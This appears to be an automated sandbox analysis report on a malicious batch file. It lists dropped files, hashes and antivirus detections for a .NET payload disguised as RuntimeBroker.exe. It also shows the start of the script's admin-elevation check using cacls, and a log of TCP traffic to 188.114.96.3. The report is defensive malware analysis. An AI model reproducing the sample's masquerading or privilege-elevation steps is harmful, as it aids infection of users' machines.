                      SHA-512:DE6375E57A674AC063AECD499D8B7FF01EBAAAFB7352CE560A2468293B3D7F7B95A5AC53751728EF0578ADCB5BF0518CE08F55CD7BD3EDD1C13B0A4866301E9B
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 66%
                      Joe Sandbox View:
                      • Filename: 4FwNHRnnXb.exe, Detection: malicious, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............+... ........@.. .......................@............@..................................+..O.......t.................... .......+............................................... ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B.................+......H........!...............................................................(....*B(....(....o....*.0..7.......(....t....r...po..........(.....rM..p(..........o....&*..0..|.......s.....(....s.....~.............~....o....&..(....&..s.......o.....o............i(...........,..o......,..o......,..o.......*.(....:.![..........Te..........io......Z .........%.....(....*..( ...*.......*.BSJB............v4.0.30319......l...L...#~......h...#Strings.... ...d...#US.........#GUID.......l...

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cwdm3s1.kdi.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34t2iizj.mkz.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hhebq3y.g2t.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3levjhjt.jrq.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ralonbj.0w1.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alilqi0u.ogo.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b51yjthu.d3t.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2kb1jmg.523.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dm1qt45w.2dh.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewtrcvbe.rai.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsovu2dr.ykn.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hddnt4ae.x4w.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jebppsmz.hrf.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyq2miu5.ibd.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naamijqf.maq.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqyboz3l.kqh.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osqe1if0.4dz.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjlqam4n.31j.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw2ryozq.whg.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u52kud21.d3a.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueypilfv.wne.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe5myg2j.cll.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzspz1p3.5oo.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbs3fngn.y2e.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Roaming\RuntimeBroker.exe

                      Download File
                      Process:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:modified
                      Size (bytes):449024
                      Entropy (8bit):7.990550406581685
                      Encrypted:true
                      SSDEEP:6144:4hE8FrC1mJDf1nkhf2TO1WGf+CXhJyBl6mVLdWYrS+ZbHegrrHW3JkGYhtoLQvlN:1mHmEOQGZv+Zb33HMYHoLQrdQq
                      MD5:7557AF6F3185128C25AEB092DC335975
                      SHA1:F0866402529BE2FDC0511305DA069B69A8A35B8E
                      SHA-256:5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
                      SHA-512:DE6375E57A674AC063AECD499D8B7FF01EBAAAFB7352CE560A2468293B3D7F7B95A5AC53751728EF0578ADCB5BF0518CE08F55CD7BD3EDD1C13B0A4866301E9B
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 66%
                      Joe Sandbox View:
                      • Filename: 4FwNHRnnXb.exe, Detection: malicious, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............+... ........@.. .......................@............@..................................+..O.......t.................... .......+............................................... ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B.................+......H........!...............................................................(....*B(....(....o....*.0..7.......(....t....r...po..........(.....rM..p(..........o....&*..0..|.......s.....(....s.....~.............~....o....&..(....&..s.......o.....o............i(...........,..o......,..o......,..o.......*.(....:.![..........Te..........io......Z .........%.....(....*..( ...*.......*.BSJB............v4.0.30319......l...L...#~......h...#Strings.... ...d...#US.........#GUID.......l...

                      \Device\Null

                      Download File
                      Process:C:\Windows\System32\cacls.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):121
                      Entropy (8bit):4.323081947925383
                      Encrypted:false
                      SSDEEP:3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
                      MD5:43B1EC1407EA9C0219A563FFFEEAE780
                      SHA1:C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
                      SHA-256:7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
                      SHA-512:5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
                      Malicious:false
                      Preview:C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....

                      Static File Info

                      General

                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):5.329525308104839
                      TrID:
                        File name:temp_script.bat
                        File size:1'667 bytes
                        MD5:7972cb9d1ef5a286c735bb8da928fbda
                        SHA1:98e294e14777cc9e5a3c7166b35b2feba3b3f140
                        SHA256:649dd265b8599866e827d12135b10b2b415d221ca4db58e1cf8c602c6afa2466
                        SHA512:f5ff10c65903c5b300eca4ba83366bf5c049eba8cf0c0b357923f5629082d3688dc5c61e36ebbaf8e6de0e44d9cb1405639fa157376996e82d541db4521c16c8
                        SSDEEP:48:0XO7BK7E4ep5hoI8BnV6J5j5xB5V5h5/gyx:0XHVeGI8hugyx
                        TLSH:F9310D220C4FA74AE7B2CDB4C2122708FA5FA34374188543B2B698206D587C5CBFEDD8
                        File Content Preview:..@echo off..set "filePath=%appdata%\Microsoft\emptyfile20947.txt"..:: BatchGotAdmin..:-------------------------------------..REM --> Check for permissions.. IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (..>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SY

                        File Icon

                        Icon Hash:9686878b929a9886

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 6, 2024 18:12:10.901654005 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:10.901679039 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:10.902033091 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:10.911817074 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:10.911830902 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.385457993 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.385535955 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.388705015 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.388715029 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.388969898 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.406569958 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.448503017 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741720915 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741782904 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741816998 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741837978 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741868973 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741883039 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.741900921 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741935015 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.741941929 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.741960049 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.741966963 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.742008924 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.742026091 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.742033005 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.742297888 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.746773958 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.790190935 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.790210009 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.828975916 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829025984 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829057932 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:11.829070091 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829086065 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:11.829122066 CEST49704443192.168.2.5188.114.96.3
